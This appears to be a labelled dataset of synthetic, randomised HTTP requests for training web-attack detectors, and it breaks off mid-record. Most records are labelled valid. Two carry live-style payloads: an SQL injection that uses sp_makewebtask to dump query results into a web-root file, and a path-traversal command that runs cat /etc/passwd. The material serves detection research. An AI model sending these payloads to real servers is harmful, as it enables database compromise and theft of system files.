Cache-Control: max-age=24296
Client-ip: 128.50.24.52
Cookie: rE=700531;lmeasze3tsgma=adeTethnrreknitaI;.jkt8=687496
Cookie2: $Version="49"
Date: Thu, 06 Jul 06 08:49:51 CET
ETag: W/"yF-ypC0B1-8uccz"
Expect: cgaczg=nthws
From: Eenieeb@jtsh.ch
If-Modified-Since: Mon, 29 May 06 11:39:15 CET
If-Unmodified-Since: Tue, 10 May 05 17:12:33 UTC
If-Match: "LjwBB8AX_5_UkdJYzC"
If-None-Match: *
If-Range: "Rrs78ST5o@@SSvh9"
Max-Forwards: 9
MIME-Version: 6.4
Pragma: e='Oa'
Proxy-Authorization: Basic aE9Jbm06N2FOcmVlbg==
Authorization: NTLM ZG10cE9taXJJbzhlZ3NvZXNrc3JsdE9obkJ4YXJlMTVh
Range: 15-,71-,5-
Referer: /o89n/ebokm.aspx
TE: gzip;q=0.5,deflate
Trailer: Accept-Charset
User-Agent: Mozilla/2.6 (compatible; MSIE 4.2; SunOS sun4u; sfispao)
UA-CPU: Sparc
UA-Disp: 031,1343,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 413x553
Via: tie/3.4 www.rnpo3csi.jpeg, HTTP/7.3 91.128.62.19, nae/6.7 www.tvdia.jpeg:2094
Transfer-Encoding: identity
Upgrade: OtSal/2.6, ete/2.1, oHfg/3.7, dMshA/4.9, hnrpor/3.2
Warning: 078 4.18.109.190 "qceetbhebMca6" "Wed, 01 Aug 07 08:37:44 CET"
X-Forwarded-For: 255.159.77.194
X-Serial-Number: 7399609
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20703
Start - Id: 41115
class: SqlInjection
GET /ardts7enNsrhqeolde/Zg.dropr0ApsSYSq/fLP/havingxp_/M_dbO9vLJ-.msf?Ch.fMphpRBF.=%27%3B+++EXEC++master.dbo.sp_makewebtask++%27c%3A%5Cinetpub%5Cwwwroot%5Cfi3eecu.htm%27%2C++++%27SELECT+++h3st++++FROM+++o6s2skr+WHERE++++xtype%3D%27%27U%27%27%27 HTTP/1.0
Host: 60.210.250.129
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: windows-874;q=0.4
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: max-age=2592
Client-ip: 7.234.69.89
Cookie: r0=l;s7allttgm=sCWWJ;umgdmsneyoacmh=348
Cookie2: $Version="75"
Date: Wed, 19 May 04 24:26:51 CET
ETag: "o2wljYaHrxuGgPOQDnb6"
Expect: iCconail
From: ljbnc@t4tt.net
If-Modified-Since: Fri, 25 Apr 08 07:44:16 CET
If-Unmodified-Since: Tue, 12 Aug 08 18:15:17 UTC
If-Match: "NYJ5sxLqLtMuby7"
If-None-Match: *
If-Range: "Ggq11yjwKPT7am@PB"
Max-Forwards: 28
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest opaque="sqsll"
Authorization: Basic dEZhbW9mOnVwYW9uaQ==
Range: -397
Referer: /e8tibd/gtT3.cgi
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.6 (compatible; Konqueror/1.8; Open BSD i586; 75LIdRs)
UA-CPU: Sparc
UA-Disp: 071,802,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 194x0684
Via: FTP/6.7 www.nChhkume.jpg, 5.8 www.tdA5iaga.tiff
Transfer-Encoding: deflate
Upgrade: mdt/1.4, asjofr/9.3, 9meo/3.8
Warning: 323 www.l1Er.tiff "djhflegmslO" "Thu, 15 Apr 04 02:45:31 UTC"
X-Forwarded-For: 120.66.15.37
X-Serial-Number: 54708069609443708
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 41115
Start - Id: 23195
class: Valid
GET /R3ata7kvNn/uo/xwX/iJuzX.html?ene6ss2ltmle=ibsh HTTP/1.1
Host: 130.69.104.7:80
Connection: keep-alive
Accept: video/mpeg;q=0.8, video/quicktime
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.6, gzip;q=0.1, compress;q=0.6
Accept-Language: *
Cache-Control: no-transform
Client-ip: 242.122.96.228
Cookie: fUsL1hEOapeeLsa=isxHiapwmeen
Cookie2: $Version="6"
Date: Tue, 18 Oct 05 02:02:06 UTC
ETag: W/"Xq5.Xw_NbR_Zdkg9UqBS"
Expect: hrteaeh=ndme
From: yEynS@yostnHon.org
If-Modified-Since: Wed, 29 Jul 09 20:48:51 UTC
If-Unmodified-Since: Tue, 23 Jun 09 23:57:47 CET
If-Match: *
If-None-Match: ".HHXhHAe8lkNOQ."
If-Range: *
Max-Forwards: 59
MIME-Version: 0.2
Pragma: aI=eh
Proxy-Authorization: Digest realm
Authorization: bhao po8eoapw=tezts
Range: -23
Referer: /rtp41e/awoar/czlc/as2osLm/weujRr.htm
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/4.4 (compatible; ca6se; Windows NT; nritrhiob; pNEgoeynht; te7uroee)
UA-CPU: PowerPC
UA-Disp: 1015,816,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 973x7584
Via: Ern5ta/6.6 47.117.141.99
Transfer-Encoding: gzip
Upgrade: enbe/7.1, 5nea/2.6, bie0n/5.7, ueru/7.3
Warning: 471 www.svNdz.jpeg "46nn" "Sat, 28 Apr 07 18:29:23 CET"
X-Forwarded-For: 175.124.77.138
X-Serial-Number: 76690909
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23195
Start - Id: 36833
class: OsCommanding
GET /hFaen/qnaBermsiiygel8tn/iF-qPc@212caQDdlLc0s/Hzeapgqtbootduoa/ldnpc39SgGa8VWh7kIH2/BHclinkM/ssNjeahchnvqhfhtt2e/indropfIxp_Cm/i@QeR4lhU0Uv1qPI0/pMl/aEtUkTUaoag/d6aUK4.css?eireml=freplacetth%27ae%3DwsEmfii%29&97Q1openVO_gfginsert=402&WMcopy2wbbodyMUBHx=sWPxwrVHtIf&8taucshe=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fbin%2Fcat+++%2Fetc%2Fpasswd++++%7C&tl5j=HidassmSotn9+t HTTP/1.0
Host: www.aatiZTtdo.gov
Connection: keep-alive
Accept: text/*;q=0.1, application/*;q=0.9
Accept-Charset: x-mac-japanese;q=0.8
Accept-Encoding: gzip;q=0.4, deflate;q=0.5, deflate;q=0.2, compress
Accept-Language: mnnr-bieqr7de, ebeb5iud-d;q=0.8, oowdha-u640f, aa1o-enfj5;q=0.2
Cache-Control: min-fresh=39
Client-ip: 22.63.188.165
Cookie: pIe=4;tastttvlNUrats=style;DTadminkexecIv1otKW=8;onsutnrym=6
Cookie2: $Version="430"
Date: Mon, 08 Mar 10 12:41:03 UTC
ETag: W/"88_JjmUC3uPuWyPt1"
If-Modified-Since: Thu, 20 Oct 05 17:13:26 CET
If-Unmodified-Since: Mon, 17 Mar 08 20:39:27 UTC
If-Match: *
If-None-Match: ".0p2GaRBocvajjP"
If-Range: Fri, 08 Aug 08 20:43:28 CET
Max-Forwards: 7
Pragma: oyroor5n='uela'
Authorization: Digest username="ugnls7"
Referer: http://www.esoizk.st/Ie5agg/ljtroarT/557kTl7.asmx
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: litrSinancc8oiaM
UA-CPU: PowerPC
UA-OS: Linux
Via: HTTP/9.6 www.dAbae6.jpg, estAtA/2.3 51.102.213.86, 8.2 142.86.183.7
Transfer-Encoding: deflate
X-Serial-Number: 578477584151
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 36833
Start - Id: 20945
class: Valid
GET /wPcXOpPnjdhusrA/spgi1ie4mziti7h8cenZ/xRl/1cwetaojcihmiteorrE/zrvYL/dSh8atbrn/zLs/sDj9vVva1nV9/derftrezssspreEr/eFycOAa7oe.php4?eaSi=53&toasSelea=trhweera&hetsrunie8eEieU=ziescripth-Iupdatesh6r&hen=62392&soP8t3c3a=ollm9ZCMXO1&loeee3=hzoG&so3kgs9nsiea=ee&8t=i5zL&rde=362&nhhddmificne=uaSaccept&D_ErRCMKDVWall=itre&snclme=Testdin%291&bttoeh=56038061&nociritsr=028584 HTTP/1.0
Host: www.ineni9soa9.uk
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: wuwinde-iz, rtloL2-d, mtsssgF-shp
Cache-Control: max-stale=79378
Client-ip: 185.198.108.159
Cookie: ush8h=htehinm9hysIgm;bzMVRs7Bt3W=L ;ju1eDneircupa=N
Cookie2: $Version="078"
Date: Sun, 18 Feb 07 11:21:11 UTC
ETag: W/"7lmlOK1WsnGndzz"
Expect: otnasaC
From: d011d@jsutlttae.it
If-Modified-Since: Sat, 05 Nov 05 04:16:15 UTC
If-Unmodified-Since: Sat, 22 Jul 06 01:39:54 GMT
If-Match: "voHg@rVgmXboIqgqt"
If-None-Match: "2U55OYQCCzeJkqL1"
If-Range: "0c.KseCGF2FSXKc@tzzb"
Max-Forwards: 2046
MIME-Version: 7.9
Pragma: ocVooey=4s8tpe
Proxy-Authorization: NTLM dGZtU3JiZGludDNZeW5pZWFkb3d5QXRiYTByemVzdDlzcGxpdmVuaWhsVGU=
Authorization: lddses 9e5dhso=lidaB7
Range: -237,00-,0218-17
Referer: /ddie/lgl7uem/a67e2/2euDtie/oItz.swf
TE: chunked
Trailer: Connection
User-Agent: Mozilla/2.8 (Machintosh; U; PPC Mac OS X 7.8; 6g-Ee; rv:1.4.6) Gecko/26597963
UA-CPU: x86
UA-Disp: 289,3069,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2279x9563
Via: Rse/6.1 27.194.154.49, 9.0 212.213.187.159
Transfer-Encoding: identity
Upgrade: de7/0.8, frcre/7.5
Warning: 810 71.224.48.238 "tio8scrsyxdd3fe" 
X-Forwarded-For: 251.229.233.197
X-Serial-Number: 2430605
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20945
Start - Id: 8008
class: Valid
POST /u1sdtnlxy/BDo58ZGcr2FvLa.html? HTTP/1.1
Content-Length: 219
Content-Language: linl0eno
Content-Encoding: gzip
Content-Location: /tasA85s/tlei/eovw9nde/6lsa/2ciidtx.tar
Content-MD5: T0dibW1seW9zZHM1cDluaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 18 Sep 06 23:19:48 UTC
Last-Modified: Wed, 11 Feb 09 23:45:11 CET
Host: www.eeeus.it
Connection: keep-alive
Accept: audio/basic, text/html
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 251.201.142.86
Cookie: nrjayob5uuyet=26366;2in0oyNthc=e xho;oursrterdx=ir;e1epmnpf< ihn:+;access_logF7V7-XnG=z| ;gugxAoelhn=24;aloleeaeiaE=wRcHatt
Cookie2: $Version="993"
Date: Mon, 21 Apr 08 16:47:09 GMT
ETag: "Uor8lt.MJfvmU1Tkr"
Expect: 100-continue
From: itepe@sh8wbe.it
If-Modified-Since: Tue, 16 Dec 08 15:07:43 GMT
If-Unmodified-Since: Wed, 13 Oct 04 15:30:06 UTC
If-Match: "IsDd9kiLjtQnXZ@Y"
If-None-Match: *
If-Range: "uazTvMrK6hIN_GpMN8sf"
Max-Forwards: 8
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: NTLM U2RyZXRvYmNycW9yZHNlWUFxb2VudHRvYXJjNmJBc0NzbzdvYnR3cw==
Authorization: Digest realm
Range: 439-82,94-,67-
Referer: /htRe/tewe/erx1tnr/ntsr.tar.gz
TE: deflate,deflate
Trailer: Upgrade
User-Agent: c4cF4cFbLm http://www.adruee.gov
UA-CPU: PowerPC
UA-Disp: 6556,373,32
UA-OS: Linux
UA-Color: color16
Via: 0.7 143.157.112.200, HTTP/3.9 46.203.255.95
Transfer-Encoding: deflate
Upgrade: ceIre/8.2
Warning: 335 140.161.205.35 "oreHylenmuo4vest" 
X-Serial-Number: 6980972846
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

durdo=~snwc d&ee=oaa&toof=a_JNE&krsdhah4=voa3hsaaa8&6CoptP=atce7bevalhti&ssfElntsy6D4u=ey=styler&qrub5snosn1=546329&iEq9h1a=hetbpg&sbrR0=pIvKh&tepueX17tpi=estdsgRhtxaarlm&lFwwdIH5feii=M9ybs:stmocha'ub~iH9e]t

End - Id: 8008
Start - Id: 28348
class: Valid
GET /Da7evalfromnFJzoaUselect/oBpn/rhEiah/ICC2/o5Hyl/e5N7ekVviLEp-K-K06X/fnTe6neRSaxoraoih/naaaihttbtes/rZ3KKSr3uXtiXgX.bin?sU9httpoYP=Oogihezoo6ethekiys&t8paiS=to&VX86EMtrH=rlatgtuje8est+l HTTP/1.0
Host: www.wcblU.gov:80
Connection: close
Accept: video/mpeg;q=0.7
Accept-Charset: x-mac-icelandic, iso-8859-15;q=0.6, iso-8859-8-i
Accept-Encoding: *
Accept-Language: drpsw-oy4b5s;q=0.1
Cache-Control: no-transform
Client-ip: 27.241.91.89
Cookie: loe=5%EiNyoE=2;dSt=EEeaccept
Cookie2: $Version="57"
Date: Sat, 12 Jul 08 19:15:21 UTC
ETag: W/"olj8UG-.o1dgyShP8aw"
Expect: RseOc
From: nicserws@tdhtrrpo.net
If-Modified-Since: Wed, 25 Mar 09 18:23:41 UTC
If-Unmodified-Since: Sat, 31 Dec 05 06:28:29 GMT
If-Match: "XEgKDJ5EPG53ZcZz"
If-None-Match: "BhTd7CDul9oxrpYubL"
If-Range: Wed, 11 May 05 21:04:00 CET
Max-Forwards: 066
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Basic bmhycGhuVzp0Y2VUYnB0dA==
Authorization: Basic YXlvYWhhdDpkc2dFcGxhYw==
Range: 2735-73,95-
Referer: http://www.74iissHa.fr/HntEW/ehaeobsn/l3Fbur/YxoIm.mspx
TE: deflate;q=0.3,chunked,trailers
Trailer: Referer
User-Agent: teue (mJqeW1N)
UA-CPU: StrongARM
UA-Disp: 547,716,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 6491x0728
Via: HTTP/0.5 104.226.96.99, 3.4 250.93.225.233
Transfer-Encoding: compress
Upgrade: mNe/8.8, ehIbla/4.3, s6oaa/4.9, cih/1.0
Warning: 338 www.dssp.htm "nWaMtidgzrTft" "Sun, 10 Jan 10 08:00:48 UTC"
X-Forwarded-For: 156.99.87.237
X-Serial-Number: 593398848683
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28348
Start - Id: 2132
class: Valid
GET /fCwpsCJU7w/bP04oCzOy3x/n3TteUaluoaaea/23xaoijQdimiTN72oo/Jd/ekmtW.O5mswY_w.cgi? HTTP/1.1
Host: www.eeabectNEc.ch
Connection: enof4
Accept: */*;q=0.0
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-cache
Client-ip: 114.64.45.35
Cookie: hwbh5whelirodrG=t05uWBp;it83fosoine=265;eti8eoeipn=9652905;e4iEwhoeel=asNtbruhe;tZz4scriptS22dscript=Aptexp_rooN;tepmn;2hen=608
Cookie2: $Version="376"
Date: Sun, 22 Jun 08 13:45:41 CET
ETag: "FAc2zi4siQ00_Em6CPV"
Expect: arcilt9l=Edo1eby;hiacaEkz=eaKki
From: m5h3d@tewicbp3ee.be
If-Modified-Since: Sat, 22 Dec 07 22:25:58 UTC
If-Unmodified-Since: Fri, 18 Mar 05 03:25:38 CET
If-Match: "J.r@RxJtIPLfo96Qy04c"
If-None-Match: "JRZAfMeNWXKrS_21"
If-Range: Sat, 03 Jun 06 01:25:07 GMT
Max-Forwards: 352
MIME-Version: 0.9
Pragma: 9t=ibalooo
Proxy-Authorization: htvp2s zeui=5aihmEt
Authorization: Digest username="a2uetsi"
Range: 9797-
Referer: http://www.2ngre.uk/iceuE/Hxselt/bksol/lt4ueore/vdls2rn.exe
TE: trailers,chunked;q=0.1
Trailer: From
User-Agent: yfQPIQME4W http://www.Acul.fr
UA-CPU: MIPS
UA-Disp: 4115,383,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 539x1521
Via: 6.9 www.rtntasue.htm
Transfer-Encoding: compress
Upgrade: LqnoEm/4.0, 2Odnr/2.0, ioip/3.7, qMe/8.4
Warning: 456 www.asdhn.gif:2845 "ronln6simQtdh" "Thu, 30 Jul 09 15:57:06 GMT"
X-Forwarded-For: 209.131.51.221
X-Serial-Number: 9895241717803854226
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2132
Start - Id: 28920
class: Valid
GET /UDLhomeuFr_.h7la/cvkwctwHh/pSm/lJxDLfM77MMgphXb/Kidffpst90dk4V/8kMpcYtojRrMxWjzlX/iL5cu2TCb9I/hh6tiNvf5rpAheaoa/7u525gKj.5/zkG4vhPKPORY3ySq2/eJ.asp? HTTP/1.1
Host: 173.16.252.111:189
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tszt04r-eCnruLd;q=0.7
Cache-Control: min-fresh=94433
Client-ip: 46.140.247.81
Cookie: cniuEroapdieCq=lkn8w5tdeleteunionchc;am5tj=32eplocationabeqtdnYedvarih;EeNhyey=ha-
Cookie2: $Version="01"
Date: Wed, 22 Mar 06 19:49:02 CET
ETag: "URKYmU-W41bbxnMyzDf@"
Expect: 100-continue
From: jel1wenc@25eoL.it
If-Modified-Since: Tue, 10 Nov 09 02:12:04 CET
If-Unmodified-Since: Sun, 03 Oct 04 02:51:55 GMT
If-Match: "_cwYsh4FPXcy6@xeVF@"
If-None-Match: *
If-Range: Wed, 25 Apr 07 20:13:27 GMT
Max-Forwards: 3
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Basic b2lyY2xlYjpvdG1laXU=
Authorization: Digest nc=94FBA603
Range: 492-,-067,215329-8229
Referer: /36sn/i0uS5e/2II8/adath2.asmx
TE: chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.8 (X11; U; Open BSD i386 3.3; bm-ye; rv:0.4.9) Gecko/91667129
UA-CPU: Sparc
UA-Disp: 219,0393,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 3649x0845
Via: HTTP/8.4 www.stbve6nn.jpg:88
Transfer-Encoding: dhriec
Upgrade: gtFdng/9.2, tlogad/2.0, 0nanTR/9.4, nu1d/8.3
Warning: 849 www.nnoei.jpeg:1260 "it14qNa9s0atUtej4rn" "Sat, 10 Oct 09 18:20:14 CET"
X-Forwarded-For: 108.24.111.61
X-Serial-Number: 4133682407405802626
----: ------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 28920
Start - Id: 2700
class: Valid
GET /pyhsJoHbpxHX/xFf.J2K@sdjYVTadGVDF/e8x_-cqEdH2ew/cVKVV6USq63jaEAanz.v/mexecV/iohqqx_y3XsVYKn/y0ed2Da/c1_kJDBYbHLKtH39/bR6eds/wlm49t/y5w/h0sTe1u.mspx?eicsqittbnLnr=oom&mmitlra=r+eoai+t&ism=5osa&kOjmetaR1cS=reDo&c3ZtDSP0xB=nketdsshutdownacceptta%28sUi%3Faahe&gstjayuy4m=e-HD8IIM&dgolamsbc7c=dgnlnn&sZecxe88eAtTla=uhOisc00uamdeOuzaF&K-Mvzob6Yv=i44eibwi&EsoerTttlmnh2=44&PQdubHLsb7F=rmtt&eeer2cenmmaan=1LYUaHM HTTP/1.0
Host: 88.201.125.210:0033
Connection: keep-alive
Accept: video/*;q=0.3, video/*;q=0.7, video/mpeg
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.5
Accept-Language: N-hs8eEfh;q=0.6
Cache-Control: no-store
Client-ip: 115.91.23.138
Cookie: oeuo=o$mceaAois;oadettaeq=355274;ehnaI= ;e1d=On1n;MIYJhaving=057880
Cookie2: $Version="345"
Date: Fri, 10 Apr 09 02:26:20 CET
ETag: "t-wCXM5GCJL@TuAsRXn5"
Expect: 100-continue
From: Dhellnoh@bmtei.net
If-Modified-Since: Sun, 31 Oct 04 13:27:55 CET
If-Unmodified-Since: Sun, 02 Oct 05 12:02:54 GMT
If-Match: "G8VrFJf4-waUmKmp"
If-None-Match: *
If-Range: *
Max-Forwards: 82
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: hnknte 6dhe=ailltedl
Authorization: eusr Tcsle6i=33kti
Range: 800-526712,0803-
Referer: http://www.wDtene.net/2fr10d/Tbam/ihIu9/6peta.pdf
TE: trailers,deflate
Trailer: Host
User-Agent: Mozilla/5.7 (compatible; MSIE 0.0; Open BSD i386; itebt)
UA-CPU: x86
UA-Disp: 6089,3163,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 486x934
Via: mebukz/9.8 www.og3t.jpeg
Transfer-Encoding: gzip
Upgrade: edxff/8.2, npviH/9.1, rot/8.2, e7yej/5.0
Warning: 013 www.PnEzft.tiff "esemnTdstra5" 
X-Forwarded-For: 197.193.27.231
X-Serial-Number: 8136074594585
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2700
Start - Id: 17335
class: Valid
GET /fromqZgdeleteGUNinTGaccept.jpeg?tdotioa=9835068&G1fAvx=3009&dst=%7Etreplacez&apoFo=mdeletebu&assz7nfttij9=ee6hvbscriptt7c&wtiNntscn=6798904016&Neii4ttyseiso=dQoek&qEt=96698&neaRoer=%3D&tnsltTH=rtnetcateomkneeval%7E%28 HTTP/1.0
Host: www.eioee.it:8
Connection: lnrtgoef
Accept: video/mpeg;q=0.0, video/quicktime, video/quicktime;q=0.5
Accept-Charset: windows-1252, windows-1255, windows-1255;q=0.5
Accept-Encoding: *
Accept-Language: pi9or-f, m-Ayam;q=0.7, mlsw-Nre;q=0.3
Cache-Control: only-if-cached
Client-ip: 192.213.242.232
Cookie: dndybodruaa=A 9s;nomnwsomrw3e=nxg;TOrhtntso=1rdivim;7oapeo4pFdehC=i@LmnGYoV9;BX-vco8UT=snfscriptw0e4tewRnctekt3;iohim=eIteawun
Cookie2: $Version="64"
Date: Sun, 13 Dec 09 12:41:30 GMT
ETag: W/"TfYClwrZHSZe-qIOZ5g"
Expect: 100-continue
From: lsh9tare@sDd5ex.cz
If-Modified-Since: Thu, 17 Dec 09 13:31:25 UTC
If-Unmodified-Since: Sat, 02 Oct 04 09:43:23 CET
If-Match: "4c7@NLxRmvqpVpE1t5sn"
If-None-Match: *
If-Range: "6zxEAMwvFoZaGmly2G"
Max-Forwards: 893
MIME-Version: 6.6
Pragma: elsSoo0=ianns
Proxy-Authorization: Digest realm
Authorization: Digest qop=aeeuu
Range: 570800-
Referer: /EftAsoty/earh0eNt.mpg
TE: deflate,trailers,deflate
Trailer: Range
User-Agent: 3Ii1nd/1.3.8.7
UA-CPU: 68000
UA-Disp: 7547,506,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 455x7663
Via: 1.5 www.0csAr.htm
Transfer-Encoding: gzip
Upgrade: tc3/9.1
Warning: 540 139.31.62.25:6754 "edlefMhEnqak" 
X-Forwarded-For: 137.232.96.91
X-Serial-Number: 874559408
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 17335
Start - Id: 617
class: Valid
GET /ev3rWP0/t2louykIooDpods1n/eAdegQPtSdGNfgzN1-S/entTihdsnjn/M1X@servicesLTCbq7c2/-9/iuHAiH-7a.fQo.php?@VmincludessystemLEMbhE=T%2B&winntBDnx=ewaase1eai&emne0zehlsl2=ftpesntuai6enr&edVgmlnflmrtr=not&aWhoTdhsaeh8Su=2566&k5276ttrebtaye=%40&i6uutoicp=uhin%26%28u%25rcpa&e7dsEunoayugil=A&A5L=arboot.inimd+&6t=+xp_eOr%3Fs%3CrhDecae&tgtrwqtadpmets=ton2Ohfa&pl=5&hp4s0ooersN1ao=wCX5E5Et7R4&asytdupdeYne=ohhghsoue0htql7b HTTP/1.0
Host: 144.64.209.11
Connection: keep-alive
Accept: */*
Accept-Charset: euc-jp, shift_jis;q=0.5
Accept-Encoding: compress, gzip, compress;q=0.8
Accept-Language: *
Cache-Control: max-age=4969
Client-ip: 89.36.24.240
Cookie: tT=tbwncTd;aTTaOls=uiet3yaNdnnnolud;dz=7342479;OIGV=8933;ps=4;ieaex=13578574
Cookie2: $Version="15"
Date: Sat, 01 Apr 06 09:52:34 GMT
ETag: "MI0nPVCyGL2S@fDb5aMc"
Expect: 100-continue
From: c8iae5ir@arholxtaey.fr
If-Modified-Since: Fri, 05 Aug 05 23:01:25 GMT
If-Unmodified-Since: Fri, 17 Apr 09 12:20:08 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 17 Mar 09 19:24:28 GMT
Max-Forwards: 3
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: NTLM all0bmFoaXVuYWNhYW9yNG8xYXdFbnJ0YXloNXNhT3NyYmFCb2VleXQ=
Authorization: NTLM bzZjbXNlbkVhcDZtYWVqcmVuZG5oMnNlMGlhZXRuZ1A=
Range: -824,94971-,-2841
Referer: http://ii2xta.ch/onfahn/zcvQw.bin
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: a46jrnfIBta8ssiwsele
UA-CPU: Sparc
UA-Disp: 2226,321,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 412x961
Via: 5.5 132.54.238.57
Transfer-Encoding: tesEtr; aPitrm=yeyayjp
Upgrade: dog/2.3, ranys/6.1, ariu/3.6, aatroo/3.3, eb8/2.3
Warning: 295 www.ensg.png "bmssbEen" 
X-Forwarded-For: 92.204.25.91
X-Serial-Number: 541499677250739
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 617
Start - Id: 7864
class: Valid
POST /5ttio3ieTseghiuWehsp/9XbFtJ_k5sR9/sdiZe5CA9s4/etMt5Eo/aaixgaih/izdfnv.php? HTTP/1.0
Content-Length: 82
Content-Language: 0sst,zii,L7
Content-Encoding: gzip
Content-Location: http://www.4heaet.org/adberdhn/hort1ndi/rslyg.jsp
Content-MD5: aHgwbVJuYW5raWhuaTN1cw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 06 Jan 04 13:52:15 UTC
Last-Modified: Tue, 02 Sep 08 08:14:30 GMT
Host: www.ufsnrcsg.net
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: euc-cn;q=0.7
Accept-Encoding: gzip;q=0.8, identity, identity;q=0.8, compress;q=0.5
Accept-Language: s-qtd, oOsry-o, f2yan-lzjdTos;q=0.9, niaarp-n, nsffh-ollDl
Cache-Control: no-cache
Client-ip: 249.93.52.55
Cookie: UjHhCM=950545912;nriiuq8eaht=]neymEo5ometaoadM2srjr8;xEnt=mastrstni8ehEon;neeeai=v;r4tls4osCno3=zsdn'7sa;a17ryllknSdO=14
Cookie2: $Version="69"
Date: Mon, 04 May 09 11:19:30 CET
ETag: W/"EYBiW_KTocMDsKLw.3"
Expect: 100-continue
From: itdt@o4lrlbdTd.gov
If-Modified-Since: Thu, 28 Oct 04 17:51:51 UTC
If-Unmodified-Since: Sat, 10 Nov 07 24:40:29 CET
If-Match: *
If-None-Match: "HDvN.LLCsxz-kCNj99"
If-Range: "zOKYW9Z3uJBRr2fCjN"
Max-Forwards: 130
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Basic bkFoZmFlbmg6czBzaWVhRTA=
Authorization: Basic aHVlbjp0d3NvZGM=
Range: 3-90,72191-
Referer: http://www.ftnrl3.ch/0aa8eker/acatTeae/tsi0uo2.zip
TE: trailers
Trailer: TE
User-Agent: Mozilla/6.4 (compatible; 0proy8ese; SunOS sun4u; rfonkurwt; nteSRon)
UA-CPU: Sparc
UA-Disp: 754,966,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7620x569
Via: d4NbE/7.1 www.d2PcsDk.png, 0.0 207.91.102.89
Transfer-Encoding: deflate
Upgrade: m6tK7q/7.7
Warning: 457 58.248.149.253 "ghot6raooeReo" 
X-Forwarded-For: 205.233.18.56
X-Serial-Number: 625088294062
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SerbAt0t=eorscti7nlv&yyroVon=heeoejt -rtatorr&wp-f+ &Rahptmolahmah0s=hxEdU-7q.

End - Id: 7864
Start - Id: 16205
class: Valid
GET /16QRaYlFqZxnq3wAxD/eRFmdA9/tvfyIy@mgzl4AgbxH-/1tlaenh1Ofqcnsretr/tS4D.png? HTTP/1.0
Host: www.eUeeft2.gov
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: compress;q=0.6, identity, gzip, identity
Accept-Language: *;q=0.4
Cache-Control: min-fresh=838
Client-ip: 229.117.141.9
Cookie: U7hEfvbscriptB=dgcs2dttetx2
Cookie2: $Version="531"
Date: Thu, 14 Aug 08 18:35:25 UTC
ETag: "YTutl-x2WB8mPoGb@L"
Expect: 100-continue
From: oltae@ieknifNr4.org
If-Modified-Since: Fri, 01 Feb 08 12:57:22 UTC
If-Unmodified-Since: Tue, 11 Mar 08 14:04:32 UTC
If-Match: *
If-None-Match: "AVRRm4rSc-i4qwEQXyt"
If-Range: Thu, 19 Mar 09 17:40:43 GMT
Max-Forwards: 38
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Digest qop=taoadOn
Authorization: ei9oOr Reap51e=Eqcl
Range: 14337-
Referer: http://lndsRan.st/hsEhe/roieaft/2ionol/oe8uoN4/ea5ncntx.cfm
TE: chunked,trailers
Trailer: Max-Forwards
